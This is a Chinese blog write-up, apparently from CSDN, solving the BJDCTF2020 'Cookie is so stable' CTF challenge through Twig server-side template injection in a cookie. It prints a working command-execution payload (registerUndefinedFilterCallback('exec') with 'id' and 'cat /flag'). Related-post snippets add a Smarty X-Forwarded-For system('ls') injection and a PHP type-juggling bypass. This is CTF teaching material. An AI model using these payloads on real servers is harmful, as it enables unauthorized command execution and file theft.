[BJDCTF2020]Cookie is so stable1

已于 2024-09-12 09:31:37 修改
阅读量420 收藏 5
点赞数 15
文章标签: java 服务器 前端
于 2024-09-12 09:29:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhi741/article/details/142162306
版权

对于这道题刚开始你会发下无论输入什么都会返回你所输入的数,

联系到SSTI注入的定义:服务器端在接收用户输入后,未经充分处理就直接将其作为模板内容的一部分进行处理. 就可以猜测它是SSTI注入。于是我们尝试一下看能否进行计算。

{{6*6}}

发现它计算成功。可以确定的是这道题应用的就是SSTI注入;于是进行构建payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

提交后回显:"你想要做什么",那肯定是cat /flag ,于是将那条语句进行修改:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

然后在发送发现回显依旧不变 what do you want to do ?

于是我用burpsurt 进行抓包给我返回了下面这张图片

什么都有没有,这下又卡住了,于是我将目光转向了题目,题目中也有Cookie的身影于是乎就有了

uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data) :的设置常见于Web服务器环境中,用于提高Web服务的安全性,确保Web服务只能访问和修改特定的文件和目录。

发现这个回显,根据提示可以用

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 

得出flag 在这里我进行说明一下语句:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 

#注册未定义过滤器的回调:{{_self.env.registerUndefinedFilterCallback("exec")}}

#获取过滤器:{{_self.env.getFilter("id")}} 

zhi741
关注
[BJDCTF2020]Cookie is so stable
zzqzzq11的博客
12-03 480
最终http://localhost/?num=2e5&md5=0e215962017&get_flag=sort%09flag即可。找⼀个本身是0e开头的,md5后也是0e开头的就⾏。跑出来⼀个结果0e215962017。原因在于"=="弱类型⽐较。⾸先第⼀个部分的绕过,这个就是intval的错误使⽤了。对于科学计数法的字符,intval会截取e前⾯的部。但是⼀旦 字符串+1 这就会导致强⾏类型转换,转换成了数字。⽽intval对于数字不会做任何处理。%09是tab的意思 %20空格 %0a换⾏。
[BJDCTF2020]Cookie is so stable 1
plant1234的博客
05-28 439
[BJDCTF2020]Cookie is so stable 1 首先打开题目发现是一个登陆框: 经过测试发现有ssti注入: 然后是检测ssti注入类型: 模板注入漏洞: 可以参考: 一篇文章带你理解漏洞之SSTI漏洞 在测试一下{{7*‘7’}} 发现是: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 所以判断是Twig 根据提示是cookie,于是登陆后抓个包得到: 在cookie的user处有注入 应为确定
Twing模板注入 [BJDCTF2020]Cookie is so stable1
m0_75178803的博客
02-28 525
打开题目我们先抓包分析一下可以输入{{7*7}}处发包试一下可以看到在cookie处存在ssti模板注入输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是模块在这里可以看出是Twing模块我们直接用固定payload就可以得到flag。
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
weixin_45577185的博客
09-06 361
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3566
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2786
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
Chrome导出cookie的实战教程
热门推荐
weixin_43178406的博客
06-29 7万+
本文主要介绍了Chrome导出cookie的实战教程,希望能对使用Chrome的同学们有所帮助。 文章目录 1. 问题描述 2. 实战工具一 3. 实战工具二
[CTF][BJDCTF2020]Cookie is so stable 1(SSTI)
Gh0st_1n_The_Shell的博客
08-16 264
从hint.php可以找到提示,要求观察cookies 打开flag.php可以看到需要输入用户名,多次试验后发现输入的用户名会以cookies的方式储存 使用dirsearch扫描没有发现什么有用的信息,一开始以为是cookies注入,但是没有找到sql注入点 猜测用户名的回显含有ssti漏洞,于是尝试输入 {7+7} 但是发现+变成了空格,于是改为了{7*7}也没有什么反应,后面才知道要两个大括号{{7*7}} 才行 经检验发现是Twig 上网搜索Twig的payload但是套用不了,后面看别人的
[BJDCTF2020]Cookie is so stable1--writeup
m0_65080524的博客
08-15 87
开始扫目录 没有发现其他线索 ,于是尝试ssti注入根据上图进行尝试,发现不是49 所以是失败了 --------因此尝试{{7*7}}输入{{7*‘7’}},返回49表示是模块输入{{7*‘7’}},返回7777777表示是模块开始尝试注入可以推动该处可能不是注入点,而题目有提示是在cookie于是用bp抓包看看user看起来就很像注入点试试看因为确定是Twig注入,所以是有固定的。
BUUCTF [BJDCTF2020]Cookie is so stable
Chu_Jian_Xiong的博客
10-10 225
[BJDCTF2020]Cookie is so stable模板注入Payload获取flag 模板注入 打开题目 直奔主题吧 发现回显和输入是一样的,猜想是模板注入 这里引入个模板注入流程图 经过测试可以发现该模板应该是Twig,直接去拿对应的Payload Payload {{_self.env.registerUndefinedFilterCallback("exec")}{{_self.env.getFilter("id")}} 获取flag 用burp做 查看根目录发现只给一个条
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 892
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
cookie is nil
最新发布
07-27
当你在编程中遇到 "cookie is nil" 的情况,通常意味着某个变量 `cookie` 被设置成了 `null` 或者空值,在许多编程语言中,包括JavaScript,它是一个表示未初始化、不存在或者已被删除的对象引用。当尝试访问这样一个空的 `cookie` 对象的属性或方法时,由于没有有效的内容,程序会抛出错误,因为nil代表没有可用的数据。 例如,在JavaScript中: ```javascript let cookie; // cookie 初始化为空 console.log(cookie.value); // 如果cookie还没有赋值,这将会报错,因为cookie is nil // 解决方案:确保先给cookie赋值再操作 cookie = getCookie(); // 获取cookie的值 if (cookie) { console.log(cookie.value); } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值